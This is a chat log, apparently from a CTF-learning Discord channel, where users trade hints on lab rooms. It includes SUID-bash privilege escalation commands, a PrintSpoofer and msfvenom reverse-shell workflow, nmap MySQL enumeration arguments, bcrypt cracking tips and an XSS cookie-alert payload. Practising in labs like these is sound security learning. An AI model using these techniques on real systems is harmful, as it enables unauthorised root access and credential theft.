drwxr-xr-x 5 cappucino cappucino 4096 Apr 30 11:03 .
drwxr-xr-x 3 root root 4096 Apr 21 2020 ..
-rwsr-sr-x 1 cappucino cappucino 1113504 Apr 30 11:03 bash
-rw------- 1 cappucino cappucino 5 Jun 4 2020 .bash_history
-rw-r--r-- 1 cappucino cappucino 220 Apr 4 2018 .bash_logout
-rw-r--r-- 1 cappucino cappucino 3771 Apr 4 2018 .bashrc
drwx------ 2 cappucino cappucino 4096 Apr 22 2020 .cache
drwx------ 3 cappucino cappucino 4096 Apr 22 2020 .gnupg
-rw-r--r-- 1 cappucino cappucino 807 Apr 4 2018 .profile
drwx------ 2 cappucino cappucino 4096 Apr 22 2020 .ssh
-rw-r--r-- 1 cappucino cappucino 0 Apr 22 2020 .sudo_as_admin_successful
It looks like the bash file is corrupted. Do you have any idea, what can be the issue?

oh i did this today

once ur in the cappucino use chmod +s bash

yes chmod +s bash , will change the permission of the file to "-rwsr-sr-x"

no u have to get the permission as show in the question

https://www.redhat.com/sysadmin/suid-sgid-sticky-bit check this out it explains suid

@white salmon helped me with this task

I believe the permission is "-rwsr-sr-x" . The answer was accepted

yep

after executing "./bash -p". I expect my privilege to escalate to root

cappucino@polonfs:~$ ./bash -p
cappucino@polonfs:~$ whoami
cappucino
cappucino@polonfs:~$ id
uid=1000(cappucino) gid=1000(cappucino) groups=1000(cappucino),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),108(lxd)
cappucino@polonfs:~$ ls

Unfortunately, i am still "cappucino". I wonder if the bash file is corrupted 😩

after running ./bash -p , were successful to escalate your privilege to root?

From your local machine copy /bash to the shared folder path, give it permissions so you cappucino can also execute it.
In polonfs machine, go to the shared folder path and execute bash.

Ok, thanks. I might miss that step. I will try that

Gave +1 Rep to @halcyon sequoia

Make sure it's owned by root

Are we allowed to ask for help on VulnNet Internal here?

guys a basic question i wanted to ask , so its from network service 2 and task 9 and it says username in the question now is this the username i did try and i got access denied for user so does it mean this is the usernmame or no

the one wiht auth plugin name :mysql_native_password is this the username

I don't think so

I think you need to read the room notes again

for that section

sepcifically the paragraph labelled "The Scenario"

alright

haaa got it thanks

Gave +1 Rep to @silver otter

whats wrong here ?

a few things, search it again and you can do use 0

or, use auxillary/admin/mysql/mysql_sql

you wrote auxilllary/scanner/mysql/mysql_sql

ya later i corrected it

o

well it doesn't seem to be correct still

YEP done it now thanks alot

Gave +1 Rep to @silver otter

excellent

Been away for a little bit...is Vulnnet:Internal still under embargo?

I guess not.

Was it?

I don't know. They've modified the discord since I was last here.

I'm looking for a nudge on PrivEsc for the "easy" Vulnnet:Internal

What is the name of the room? @short fox

VulNet and?

Is the creator of vuln net series in here? I have a question about the intended priv esc but don’t want to spoil the embargo. I’ve finished the room but don’t want to ruin the embargo

I can’t find them

Can I DM you?

Go for it but the room is still under embargo until tomorrow Atleast I think

@white salmon the name of the room is "VulnNet: Internal"

Also Yes, the room creator is TheCyb3rW0lf

Go and watch for ||Internal|| things

VulnNet: Internal is? Ok, that's what I was trying to figure out. Thanks.

Gave +1 Rep to @potent quail

Could someone give me a hint or tell me what im doing wrong on RA2? I got the first two flags, but having lots of trouble for flag3. I was able to successfully download the PrintSpoofer exploit onto my attackbox, create a shell.exe with msfvenom, and using an http.server, and using Invoke-WebRequest to move them onto the Windows Machine. I use nlwrap to listen onto the port the reverse shell was created for, and I run the printspoofer exploit on the windows machine with the -c shell.exe argument. It picks up the connection, but no command prompt opens

have screenshots to show

@potent quail you can do it without exploit

What do you mean @agile jewel - you have to exploit something to get better privs lol. If you mean without THE exploit, I know. I just wanted to confirm with the room creator, which I’ve now done.

1 day left till I can ask for hints on dns recon on nahamstore

Hi, I'm already connected Internal(VulnNet Internal) server via ssh. I couldn't access root user. I tried some different techniques but I failed. :/ Can I take any hint? #VulnNet: Internal

Can anyone help witg the XSS room - Q3: Create an alert pop box that appears on page with document cookie. Why is <script>alert(document.cookie)<.scritp> a wrong answer when it executes fine in lab but the Answer box says incorrect?

typo in the closing part of the html tags, possibly

can anyone give a nudge on luniz ctf?, the bcrypt cracking part as john isnt working

I haven't done that room, sorry

keep enumerating the box

I dont have permission to go in home directories where most likely the flags it

there is a /proct/pass/bcrypt.py script

it has a hash

and thats where I am stuck

i know about that, keep enumerating the box regardless, run your scans again

I did run the linpease.sh

I found there is an internap

internal*

port on 8000

do you have a shell? linpeas run locally so you just ran it on your own box, not the target

I have

a shell

using the command executor, I got the nc revshell

I uploaded the linpeas after stabilizing the shell

@lofty girder

theres more than one path to root

well

let me check other paths

Any Hint for wreath

I think wreath is a walkthrough with included instructions

anything in particular you are struggling with you can ask in #wreath-network however

Is anyone able to help me wit the 'crackthehash' room? I'm having real problems with Task 1 Q4 where the hint says "it's not bcrypt". I have tried every algorithm I can find and no dice. I think I've identified it as ||wbb3|| but hashcat and john don't appear to like it. I considered that the password might not be in rockyou but I can't find any online crackers that can do it either.

Please help me discord users, you're my only hope.

@brittle marten Search the first three digits of the hash i.e$2y$ and see what comes up.

Oh so perhaps I was right originally and I should have just left hashcat going.

When it estimated over a day to crack I assumed I'd got it wrong

is far below rockyou's list...

OK, so would you recommend I use hashcat and GPU or john and CPU to crack it?

I think the time estimated is based on the hashcat ability to try every word's hash value with the hash you want to crack.

I've read about how this particular type of hash negates the benefits of the GPU. But I've just bought a brand new GPU and this is the first THM hash that wasn't cracked instantly 😆

Personally, I would recommend you to install hashcat in your windows and crack hashes with Hashcat and GPU.

OK, that's exactly how I'm running it. Thanks.

Welcome!

hashid if I remember correctly does ID the hash

Yeah but the hint told me explicitly that this was wrong.

It's good to know at least that I had done everything right.

the hint is right

I think

Hint says: Try some other formats that start with the letter b

The correct hash does start with b. 🙂

Ha ha, that is true. But it definitely reads as though ||bcrypt|| is not the right algorithm.

well therein lies the trick lol

Now I'm back to being confused. I tried every other algorithm starting with a b to no success.

for reference sake I think THM CTF's won't expect you to crack a hash for more than 5 minutes on a standard gpu

if the challenge involves hash cracking

Yeah that was my thinking.

so what options did you get from hashid

So now I'm back to thinking that ||bcrypt|| is wrong but I have no idea what to do.

One second, let me run it again. Definitely bcrypt and wbb3

Oh, and blowfish

which appears to be the same as bcrypt

ignore what it appears to be

they have the same code in hashcat

well, that's the trick

lol

hey so i have a doubt its from netrwok services 2 and its sort of out of topic or alternative to the given method and i tired to do it , so i want to understand . As it says the alternative method using nmap --script=mysql-enum target how do i check the arguments for the script and if i am i want to send the username and password task9

^^ I am also interested in this. I decided to give up and come back to it later.

next time just in case it is always a good idea to check the hash in https://hashes.com/en/tools/hash_identifier

Which task? Also, please be more specific.

Oh task 9

task 9 and from netrwork services 2

so this method is given as the alternative method

Thanks. Used that too. Everything is telling me the same thing, but I still feel the hint is misleading.

Gave +1 Rep to @brave vale

I'll teach you in a way you can know for every future question about nmap scripting, but basically just do man nmap and read the section about scripts

check https://nmap.org/nsedoc/scripts/mysql-enum.html

or check the website from nmap specifically for the script I guess whatever you find easier

i did and i dint understand hehe

what didn't you understand?

i checked it there are args for brute usrrname and password and i want to use that

how to pass args and if i have to check the args for a particular script

use --script-args

and i am very basic to nmap so i wanted to try this out to understand

yeah I'm trying to show you a method that will always be useful

because just telling you how to work it out in this once instance I feel wont stick

and pass the args brute.password=password , brute.username=root like this

@bold lichen Your question is perfect with the article here: https://pentestlab.blog/2013/04/21/pen-testing-sql-servers-with-nmap/

the nmap comannd I use when I want to find more about a script is --script-help <scriptname>

which, is in the man page for nmap

if you need information about a nmap script you can use --script-help or check the website

@bold lichen
As I told you, research is something you need to adapt to.
You will not find everything in 1-2 searches. Keep digging and connect the dots together. You will get it.

but i have the script name

alright

the thing is i am not sure how to use the args

nmap --script-help <scriptname> | this already assumes you know the script name which is why I put it in <> brackets

take a moment to read the following, so that you can go deeper into this https://nmap.org/book/nse-usage.html

oh my bad okay thanks alot

Gave +1 Rep to @silver otter

yep i am reading the one hackster sent me

if i have doubt i will message u all

thanks

thanks

np gl!

Anytime.

so i read the article and even the one page by @brave vale

the thing is

one sec i might be able to explain m doubt with the doc

so this is the args page for mysql-enum rite, so i have to use --script-args and what do i type next

nmap -p 3306 <ip> --script mysql-query --script-args='query="<query>"[,username=<username>,password=<password>]'

okay query=query ?

Yea, query can be something like SELECT host, user FROM mysql.user

okay

so if i have to pass username and password for mysql-enum

will it be

guys how to join vc i cant join any vc

nmap -p 3306 <ip> --script mysql-enum --script-args=mysql-enum.userdb [username=<username>]

i am getting an error

I am not pretty sure, but we can try. Let's continue this in Private chat. Shall we? @bold lichen

You need to verify

Also, the script name is mysql-enum @bold lichen

thanku @tight fulcrum

but from where bro

!docs verify

ok thanku

follow the instructions

ok

failed to resolve the passdb tho i have no clue of the argument hasnt clearly mentioned what it suppose to use for

but thanks i understood the main part

Gave +1 Rep to @halcyon sequoia

How is lazyadmin for beginners ?

@bold lichen It's a good CTF. Beginner Friendly!

alright thanks

Thanks for the help. It turns out it only took 20 mins to crack so I should have just left it running.

Gave +1 Rep to @silver otter

glad you got there, surprising it took 20 mins but yeah

is it alright to watch a video and learn about it

I'll recommend trying yourself first. Else it is completely up-to you.

just starting up brainstorm

@silver otter so still the same problem

i used
sudo nmap -sC -sV 10.10.138.143
still saying no to ping requests

does the command still run or just end?

just ends

sudo should make it auto not worry about that

it's a windows machine..

will have to add -sS then

and see how you go

okay

unless you aren' connected to the vpn or have the wrong ip address

lol

lol no im connected for sure cos i was just doing gatekeeper

well make sure target ip is right

yep confirmed

i copied straight from thm

sudo nmap -sS -sV -sC 10.10.138.143
same result

can send screens if that helps

sure

its not letting me send screens on this server?

you have to verify first

!docs verify

just just have to add Pn

I can confirm nmap -Pn 10.10.13x.14x completed in like 1 minute

and got what I needed for the room

though I apparently need to fix my nmap knowledge because I thought -sS also ignored pings

yeah youre right
mine worked too
i think it was scanning all ports which made it slow

esp with -Pn

awesome
thanks a lot @silver otter

Gave +1 Rep to @silver otter

really appreciate the help

np

hey! bit stuck on Ice room specifically Task 4 Escalate - I have identified the exploit to be ran but mi am getting an OptionValidateError when I run it that means the exploit completes but no session is created - anyone idea whats gone wrong? 😦

any hints for privesc on Overpass 1? I believe i'm supposed to be exploiting the ||crontab job|| but i'm not sure how to approach it.

@radiant badge Did you see the ||cronjob?||